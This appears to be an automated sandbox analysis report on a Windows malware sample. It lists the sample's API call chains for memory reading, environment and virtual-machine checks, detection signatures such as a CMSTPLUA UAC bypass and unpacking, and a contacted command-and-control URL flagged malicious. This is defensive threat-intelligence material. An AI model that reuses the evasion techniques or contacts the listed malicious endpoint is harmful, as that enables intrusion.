Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe Code function: ExpandEnvironmentStringsW,GetModuleHandleW,GetModuleHandleW,GetProcAddress,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetCurrentProcessId,OpenProcess,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,GetWindowsDirectoryW,StrNCatW,VirtualAlloc,lstrcpyW,GetModuleFileNameW,ReadProcessMemory,ReadProcessMemory,CloseHandle,StrCmpIW, explorer.exe 0_2_010993B0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe Code function: ExpandEnvironmentStringsW,GetModuleHandleW,GetModuleHandleW,GetProcAddress,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetCurrentProcessId,OpenProcess,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,GetWindowsDirectoryW,StrNCatW,VirtualAlloc,lstrcpyW,GetModuleFileNameW,ReadProcessMemory,ReadProcessMemory,CloseHandle,StrCmpIW, explorer.exe 0_2_010993B0
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe Code function: 0_2_00155125 cpuid 0_2_00155125
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe Code function: 0_2_00154D70 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 0_2_00154D70
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe Code function: 0_2_010989B0 EnumDisplayDevicesW,EnumDisplayDevicesW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,EnumDisplayDevicesW,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,PathCombineW,GetFileAttributesW,PathCombineW,GetFileAttributesW,PathCombineW,PathCombineW,PathCombineW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,lstrcmpA,GetProcessHeap,GetProcessHeap,HeapFree,GetProcessHeap,GetProcessHeap,HeapFree,PathCombineW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,GetProcessHeap,HeapFree,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesExW,GetComputerNameW,GetUserNameW,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,lstrcmpW,lstrcmpW,StrStrW,lstrcmpW,lstrcmpW,lstrcmpW,GlobalMemoryStatusEx,lstrcmpW,lstrcmpW,lstrcmpW,PathCombineW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,FindNextFileW,FindClose,GetModuleFileNameW,StrStrIW, 0_2_010989B0

No Screenshots

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1541791 Sample: SecuriteInfo.com.Win32.Cryp... Startdate: 25/10/2024 Architecture: WINDOWS Score: 100 8 Found malware configuration 2->8 10 Malicious sample detected (through community Yara rule) 2->10 12 Antivirus / Scanner detection for submitted sample 2->12 14 6 other signatures 2->14 5 SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe 2->5         started        process3 signatures4 16 Contains functionality to bypass UAC (CMSTPLUA) 5->16 18 Detected unpacking (creates a PE file in dynamic memory) 5->18 20 Found evasive API chain (may stop execution after checking mutex) 5->20 22 3 other signatures 5->22
No contacted IP infos

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://217.195.153.196/academy.php true
    		unknown